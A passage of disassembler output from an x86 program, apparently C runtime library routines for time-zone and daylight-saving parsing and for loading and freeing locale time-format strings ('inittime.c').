movsx ecx, byte ptr [eax]
cmp ecx, 30h
jl short loc_433340
mov edx, [ebp+var_C]
movsx eax, byte ptr [edx]
cmp eax, 39h
jg short loc_433340
loc_433335: ; CODE XREF: sub_433090+28D�j
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
jmp short loc_433314
; ---------------------------------------------------------------------------
loc_433340: ; CODE XREF: sub_433090+298�j
; sub_433090+2A3�j
mov edx, [ebp+var_C]
movsx eax, byte ptr [edx]
cmp eax, 3Ah
jnz loc_4333E5
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
mov edx, [ebp+var_C]
push edx
call sub_41E610
add esp, 4
imul eax, 3Ch
mov ecx, ds:dword_454488
add ecx, eax
mov ds:dword_454488, ecx
loc_433375: ; CODE XREF: sub_433090+304�j
mov edx, [ebp+var_C]
movsx eax, byte ptr [edx]
cmp eax, 30h
jl short loc_433396
mov ecx, [ebp+var_C]
movsx edx, byte ptr [ecx]
cmp edx, 39h
jg short loc_433396
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
jmp short loc_433375
; ---------------------------------------------------------------------------
loc_433396: ; CODE XREF: sub_433090+2EE�j
; sub_433090+2F9�j
mov ecx, [ebp+var_C]
movsx edx, byte ptr [ecx]
cmp edx, 3Ah
jnz short loc_4333E5
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
mov ecx, [ebp+var_C]
push ecx
call sub_41E610
add esp, 4
mov edx, ds:dword_454488
add edx, eax
mov ds:dword_454488, edx
loc_4333C4: ; CODE XREF: sub_433090+353�j
mov eax, [ebp+var_C]
movsx ecx, byte ptr [eax]
cmp ecx, 30h
jl short loc_4333E5
mov edx, [ebp+var_C]
movsx eax, byte ptr [edx]
cmp eax, 39h
jg short loc_4333E5
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
jmp short loc_4333C4
; ---------------------------------------------------------------------------
loc_4333E5: ; CODE XREF: sub_433090+2B9�j
; sub_433090+30F�j ...
cmp [ebp+var_4], 0
jz short loc_4333F9
mov edx, ds:dword_454488
neg edx
mov ds:dword_454488, edx
loc_4333F9: ; CODE XREF: sub_433090+359�j
mov eax, [ebp+var_C]
movsx ecx, byte ptr [eax]
mov ds:dword_45448C, ecx
cmp ds:dword_45448C, 0
jz short loc_43342E
push 3
mov edx, [ebp+var_C]
push edx
mov eax, ds:off_454518
push eax
call sub_41E510
add esp, 0Ch
mov ecx, ds:off_454518
mov byte ptr [ecx+3], 0
jmp short loc_433437
; ---------------------------------------------------------------------------
loc_43342E: ; CODE XREF: sub_433090+37C�j
mov edx, ds:off_454518
mov byte ptr [edx], 0
loc_433437: ; CODE XREF: sub_433090:loc_43320E�j
; sub_433090+1B7�j ...
mov esp, ebp
pop ebp
retn
sub_433090 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_433440 proc near ; CODE XREF: sub_42D9A0+CF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 0Bh
call sub_423280
add esp, 4
mov eax, [ebp+arg_0]
push eax
call sub_433470
add esp, 4
mov [ebp+var_4], eax
push 0Bh
call sub_423320
add esp, 4
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_433440 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_433470 proc near ; CODE XREF: sub_433440+12�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp ds:dword_45448C, 0
jnz short loc_433484
xor eax, eax
jmp loc_433766
; ---------------------------------------------------------------------------
loc_433484: ; CODE XREF: sub_433470+B�j
mov eax, [ebp+arg_0]
mov ecx, [eax+14h]
cmp ecx, ds:dword_454520
jnz short loc_4334A4
mov edx, [ebp+arg_0]
mov eax, [edx+14h]
cmp eax, ds:dword_454530
jz loc_43366B
loc_4334A4: ; CODE XREF: sub_433470+20�j
cmp ds:dword_4F3558, 0
jz loc_433625
xor ecx, ecx
mov cx, ds:word_4F35F8
test ecx, ecx
jnz short loc_433519
xor edx, edx
mov dx, ds:word_4F3606
push edx
xor eax, eax
mov ax, ds:word_4F3604
push eax
xor ecx, ecx
mov cx, ds:word_4F3602
push ecx
xor edx, edx
mov dx, ds:word_4F3600
push edx
push 0
xor eax, eax
mov ax, ds:word_4F35FC
push eax
xor ecx, ecx
mov cx, ds:word_4F35FE
push ecx
xor edx, edx
mov dx, ds:word_4F35FA
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+14h]
push ecx
push 1
push 1
call sub_433770
add esp, 2Ch
jmp short loc_43356A
; ---------------------------------------------------------------------------
loc_433519: ; CODE XREF: sub_433470+4C�j
xor edx, edx
mov dx, ds:word_4F3606
push edx
xor eax, eax
mov ax, ds:word_4F3604
push eax
xor ecx, ecx
mov cx, ds:word_4F3602
push ecx
xor edx, edx
mov dx, ds:word_4F3600
push edx
xor eax, eax
mov ax, ds:word_4F35FE
push eax
push 0
push 0
xor ecx, ecx
mov cx, ds:word_4F35FA
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+14h]
push eax
push 0
push 1
call sub_433770
add esp, 2Ch
loc_43356A: ; CODE XREF: sub_433470+A7�j
xor ecx, ecx
mov cx, ds:word_4F35A4
test ecx, ecx
jnz short loc_4335D2
xor edx, edx
mov dx, ds:word_4F35B2
push edx
xor eax, eax
mov ax, ds:word_4F35B0
push eax
xor ecx, ecx
mov cx, ds:word_4F35AE
push ecx
xor edx, edx
mov dx, ds:word_4F35AC
push edx
push 0
xor eax, eax
mov ax, ds:word_4F35A8
push eax
xor ecx, ecx
mov cx, ds:word_4F35AA
push ecx
xor edx, edx
mov dx, ds:word_4F35A6
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+14h]
push ecx
push 1
push 0
call sub_433770
add esp, 2Ch
jmp short loc_433623
; ---------------------------------------------------------------------------
loc_4335D2: ; CODE XREF: sub_433470+105�j
xor edx, edx
mov dx, ds:word_4F35B2
push edx
xor eax, eax
mov ax, ds:word_4F35B0
push eax
xor ecx, ecx
mov cx, ds:word_4F35AE
push ecx
xor edx, edx
mov dx, ds:word_4F35AC
push edx
xor eax, eax
mov ax, ds:word_4F35AA
push eax
push 0
push 0
xor ecx, ecx
mov cx, ds:word_4F35A6
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+14h]
push eax
push 0
push 0
call sub_433770
add esp, 2Ch
loc_433623: ; CODE XREF: sub_433470+160�j
jmp short loc_43366B
; ---------------------------------------------------------------------------
loc_433625: ; CODE XREF: sub_433470+3B�j
push 0
push 0
push 0
push 2
push 0
push 0
push 1
push 4
mov ecx, [ebp+arg_0]
mov edx, [ecx+14h]
push edx
push 1
push 1
call sub_433770
add esp, 2Ch
push 0
push 0
push 0
push 2
push 0
push 0
push 5
push 0Ah
mov eax, [ebp+arg_0]
mov ecx, [eax+14h]
push ecx
push 1
push 0
call sub_433770
add esp, 2Ch
loc_43366B: ; CODE XREF: sub_433470+2E�j
; sub_433470:loc_433623�j
mov edx, ds:dword_454524
cmp edx, ds:dword_454534
jge short loc_4336C4
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
cmp ecx, ds:dword_454524
jl short loc_433695
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
cmp eax, ds:dword_454534
jle short loc_43369C
loc_433695: ; CODE XREF: sub_433470+215�j
xor eax, eax
jmp loc_433766
; ---------------------------------------------------------------------------
loc_43369C: ; CODE XREF: sub_433470+223�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
cmp edx, ds:dword_454524
jle short loc_4336C2
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
cmp ecx, ds:dword_454534
jge short loc_4336C2
mov eax, 1
jmp loc_433766
; ---------------------------------------------------------------------------
loc_4336C2: ; CODE XREF: sub_433470+238�j
; sub_433470+246�j
jmp short loc_433707
; ---------------------------------------------------------------------------
loc_4336C4: ; CODE XREF: sub_433470+207�j
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
cmp eax, ds:dword_454534
jl short loc_4336E0
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
cmp edx, ds:dword_454524
jle short loc_4336E7
loc_4336E0: ; CODE XREF: sub_433470+260�j
mov eax, 1
jmp short loc_433766
; ---------------------------------------------------------------------------
loc_4336E7: ; CODE XREF: sub_433470+26E�j
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
cmp ecx, ds:dword_454534
jle short loc_433707
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
cmp eax, ds:dword_454524
jge short loc_433707
xor eax, eax
jmp short loc_433766
; ---------------------------------------------------------------------------
loc_433707: ; CODE XREF: sub_433470:loc_4336C2�j
; sub_433470+283�j ...
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
imul edx, 3Ch
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, edx
mov edx, [ebp+arg_0]
mov eax, [edx+8]
imul eax, 0E10h
add ecx, eax
imul ecx, 3E8h
mov [ebp+var_4], ecx
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
cmp edx, ds:dword_454524
jnz short loc_433752
mov eax, [ebp+var_4]
cmp eax, ds:dword_454528
jl short loc_43374E
mov eax, 1
jmp short loc_433766
; ---------------------------------------------------------------------------
loc_43374E: ; CODE XREF: sub_433470+2D5�j
xor eax, eax
jmp short loc_433766
; ---------------------------------------------------------------------------
loc_433752: ; CODE XREF: sub_433470+2CA�j
mov ecx, [ebp+var_4]
cmp ecx, ds:dword_454538
jge short loc_433764
mov eax, 1
jmp short loc_433766
; ---------------------------------------------------------------------------
loc_433764: ; CODE XREF: sub_433470+2EB�j
xor eax, eax
loc_433766: ; CODE XREF: sub_433470+F�j
; sub_433470+227�j ...
mov esp, ebp
pop ebp
retn
sub_433470 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_433770 proc near ; CODE XREF: sub_433470+9F�p
; sub_433470+F2�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
sub esp, 14h
cmp [ebp+arg_4], 1
jnz loc_43384C
mov eax, [ebp+arg_8]
and eax, 3
test eax, eax
jnz short loc_433799
mov ecx, [ebp+arg_C]
mov edx, ds:dword_454538[ecx*4]
mov [ebp+var_C], edx
jmp short loc_4337A6
; ---------------------------------------------------------------------------
loc_433799: ; CODE XREF: sub_433770+18�j
mov eax, [ebp+arg_C]
mov ecx, ds:dword_45456C[eax*4]
mov [ebp+var_C], ecx
loc_4337A6: ; CODE XREF: sub_433770+27�j
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_8], edx
mov eax, [ebp+arg_8]
sub eax, 46h
imul eax, 16Dh
mov ecx, [ebp+var_8]
add ecx, eax
mov edx, [ebp+arg_8]
sub edx, 1
sar edx, 2
lea eax, [ecx+edx-0Dh]
cdq
mov ecx, 7
idiv ecx
mov [ebp+var_4], edx
mov edx, [ebp+var_4]
cmp edx, [ebp+arg_14]
jg short loc_4337F9
mov eax, [ebp+arg_14]
sub eax, [ebp+var_4]
mov ecx, [ebp+arg_10]
sub ecx, 1
imul ecx, 7
add ecx, [ebp+var_8]
add ecx, eax
mov [ebp+var_8], ecx
jmp short loc_43380D
; ---------------------------------------------------------------------------
loc_4337F9: ; CODE XREF: sub_433770+6E�j
mov edx, [ebp+arg_14]
sub edx, [ebp+var_4]
mov eax, [ebp+arg_10]
imul eax, 7
add eax, [ebp+var_8]
add eax, edx
mov [ebp+var_8], eax
loc_43380D: ; CODE XREF: sub_433770+87�j
cmp [ebp+arg_10], 5
jnz short loc_43384A
mov ecx, [ebp+arg_8]
and ecx, 3
test ecx, ecx
jnz short loc_43382C
mov edx, [ebp+arg_C]
mov eax, ds:dword_45453C[edx*4]
mov [ebp+var_10], eax
jmp short loc_433839
; ---------------------------------------------------------------------------
loc_43382C: ; CODE XREF: sub_433770+AB�j
mov ecx, [ebp+arg_C]
mov edx, ds:dword_454570[ecx*4]
mov [ebp+var_10], edx
loc_433839: ; CODE XREF: sub_433770+BA�j
mov eax, [ebp+var_8]
cmp eax, [ebp+var_10]
jle short loc_43384A
mov ecx, [ebp+var_8]
sub ecx, 7
mov [ebp+var_8], ecx
loc_43384A: ; CODE XREF: sub_433770+A1�j
; sub_433770+CF�j
jmp short loc_433881
; ---------------------------------------------------------------------------
loc_43384C: ; CODE XREF: sub_433770+A�j
mov edx, [ebp+arg_8]
and edx, 3
test edx, edx
jnz short loc_433865
mov eax, [ebp+arg_C]
mov ecx, ds:dword_454538[eax*4]
mov [ebp+var_14], ecx
jmp short loc_433872
; ---------------------------------------------------------------------------
loc_433865: ; CODE XREF: sub_433770+E4�j
mov edx, [ebp+arg_C]
mov eax, ds:dword_45456C[edx*4]
mov [ebp+var_14], eax
loc_433872: ; CODE XREF: sub_433770+F3�j
mov ecx, [ebp+var_14]
mov [ebp+var_8], ecx
mov edx, [ebp+var_8]
add edx, [ebp+arg_18]
mov [ebp+var_8], edx
loc_433881: ; CODE XREF: sub_433770:loc_43384A�j
cmp [ebp+arg_0], 1
jnz short loc_4338C1
mov eax, [ebp+var_8]
mov ds:dword_454524, eax
mov ecx, [ebp+arg_1C]
imul ecx, 3Ch
mov edx, [ebp+arg_20]
add edx, ecx
imul edx, 3Ch
mov eax, [ebp+arg_24]
add eax, edx
imul eax, 3E8h
mov ecx, [ebp+arg_28]
add ecx, eax
mov ds:dword_454528, ecx
mov edx, [ebp+arg_8]
mov ds:dword_454520, edx
jmp loc_433964
; ---------------------------------------------------------------------------
loc_4338C1: ; CODE XREF: sub_433770+115�j
mov eax, [ebp+var_8]
mov ds:dword_454534, eax
mov ecx, [ebp+arg_1C]
imul ecx, 3Ch
mov edx, [ebp+arg_20]
add edx, ecx
imul edx, 3Ch
mov eax, [ebp+arg_24]
add eax, edx
imul eax, 3E8h
mov ecx, [ebp+arg_28]
add ecx, eax
mov ds:dword_454538, ecx
mov edx, ds:dword_454490
imul edx, 3E8h
mov eax, ds:dword_454538
add eax, edx
mov ds:dword_454538, eax
cmp ds:dword_454538, 0
jge short loc_433931
mov ecx, ds:dword_454538
add ecx, 5265C00h
mov ds:dword_454538, ecx
mov edx, ds:dword_454534
sub edx, 1
mov ds:dword_454534, edx
jmp short loc_43395B
; ---------------------------------------------------------------------------
loc_433931: ; CODE XREF: sub_433770+19C�j
cmp ds:dword_454538, 5265C00h
jl short loc_43395B
mov eax, ds:dword_454538
sub eax, 5265C00h
mov ds:dword_454538, eax
mov ecx, ds:dword_454534
add ecx, 1
mov ds:dword_454534, ecx
loc_43395B: ; CODE XREF: sub_433770+1BF�j
; sub_433770+1CB�j
mov edx, [ebp+arg_8]
mov ds:dword_454530, edx
loc_433964: ; CODE XREF: sub_433770+14C�j
mov esp, ebp
pop ebp
retn
sub_433770 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_433970 proc near ; DATA XREF: _2:00454304�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
cmp ds:dword_4F3404, 0
jz loc_433A11
push 48h
push offset aInittime_c ; "inittime.c"
push 2
push 0ACh
push 1
call sub_41C2D0
add esp, 14h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4339AC
mov eax, 1
jmp loc_433A47
; ---------------------------------------------------------------------------
loc_4339AC: ; CODE XREF: sub_433970+30�j
mov eax, [ebp+var_4]
push eax
call sub_433A50
add esp, 4
test eax, eax
jz short loc_4339DD
mov ecx, [ebp+var_4]
push ecx
call sub_433FE0
add esp, 4
push 2
mov edx, [ebp+var_4]
push edx
call sub_41CA10
add esp, 8
mov eax, 1
jmp short loc_433A47
; ---------------------------------------------------------------------------
loc_4339DD: ; CODE XREF: sub_433970+4A�j
mov eax, [ebp+var_4]
mov ds:off_454D28, eax
mov ecx, ds:dword_4F3614
push ecx
call sub_433FE0
add esp, 4
push 2
mov edx, ds:dword_4F3614
push edx
call sub_41CA10
add esp, 8
mov eax, [ebp+var_4]
mov ds:dword_4F3614, eax
xor eax, eax
jmp short loc_433A47
; ---------------------------------------------------------------------------
loc_433A11: ; CODE XREF: sub_433970+B�j
mov ds:off_454D28, offset off_454D30
mov ecx, ds:dword_4F3614
push ecx
call sub_433FE0
add esp, 4
push 2
mov edx, ds:dword_4F3614
push edx
call sub_41CA10
add esp, 8
mov ds:dword_4F3614, 0
xor eax, eax
loc_433A47: ; CODE XREF: sub_433970+37�j
; sub_433970+6B�j ...
mov esp, ebp
pop ebp
retn
sub_433970 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_433A50 proc near ; CODE XREF: sub_433970+40�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], 0
xor eax, eax
mov ax, ds:word_4F364E
mov [ebp+var_4], eax
xor ecx, ecx
mov cx, ds:word_4F3650
mov [ebp+var_8], ecx
cmp [ebp+arg_0], 0
jnz short loc_433A82
or eax, 0FFFFFFFFh
jmp loc_433FDB
; ---------------------------------------------------------------------------
loc_433A82: ; CODE XREF: sub_433A50+28�j
mov edx, [ebp+arg_0]
add edx, 4
push edx
push 31h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 8
push edx
push 32h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 0Ch
push edx
push 33h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 10h
push edx
push 34h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 14h
push edx
push 35h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 18h
push edx
push 36h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
push edx
push 37h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 20h
push edx
push 2Ah
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 24h
push edx
push 2Bh
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 28h
push edx
push 2Ch
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 2Ch
push edx
push 2Dh
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 30h
push edx
push 2Eh
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 34h
push edx
push 2Fh
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 1Ch
push edx
push 30h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 38h
push edx
push 44h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 3Ch
push edx
push 45h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 40h
push edx
push 46h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 44h
push edx
push 47h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 48h
push edx
push 48h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 4Ch
push edx
push 49h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 50h
push edx
push 4Ah
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 54h
push edx
push 4Bh
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 58h
push edx
push 4Ch
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 5Ch
push edx
push 4Dh
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 60h
push edx
push 4Eh
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 64h
push edx
push 4Fh
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 68h
push edx
push 38h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 6Ch
push edx
push 39h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 70h
push edx
push 3Ah
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 74h
push edx
push 3Bh
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 78h
push edx
push 3Ch
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 7Ch
push edx
push 3Dh
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 80h
push edx
push 3Eh
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 84h
push edx
push 3Fh
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 88h
push edx
push 40h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 8Ch
push edx
push 41h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 90h
push edx
push 42h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 94h
push edx
push 43h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 98h
push edx
push 28h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 9Ch
push edx
push 29h
mov eax, [ebp+var_4]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 0A0h
push edx
push 1Fh
mov eax, [ebp+var_8]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 0A4h
push edx
push 20h
mov eax, [ebp+var_8]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
add edx, 0A8h
push edx
push 1003h
mov eax, [ebp+var_8]
push eax
push 1
call sub_438A00
add esp, 10h
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
loc_433FDB: ; CODE XREF: sub_433A50+2D�j
mov esp, ebp
pop ebp
retn
sub_433A50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_433FE0 proc near ; CODE XREF: sub_433970+50�p
; sub_433970+7C�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jnz short loc_433FEE
jmp loc_4342E9
; ---------------------------------------------------------------------------
loc_433FEE: ; CODE XREF: sub_433FE0+7�j
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ecx
call sub_41CA10
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+8]
push eax
call sub_41CA10
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
push edx
call sub_41CA10
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+10h]
push ecx
call sub_41CA10
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+14h]
push eax
call sub_41CA10
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+18h]
push edx
call sub_41CA10
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
call sub_41CA10
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+20h]
push eax
call sub_41CA10
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+24h]
push edx
call sub_41CA10
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
push ecx
call sub_41CA10
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+2Ch]
push eax
call sub_41CA10
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+30h]
push edx
call sub_41CA10
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+34h]
push ecx
call sub_41CA10
add esp, 8
push 2
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
push eax
call sub_41CA10
add esp, 8
push 2
mov ecx, [ebp+arg_0]
mov edx, [ecx+38h]
push edx
call sub_41CA10
add esp, 8
push 2
mov eax, [ebp+arg_0]
mov ecx, [eax+3Ch]
push ecx
call sub_41CA10
add esp, 8
push 2
mov edx, [ebp+arg_0]
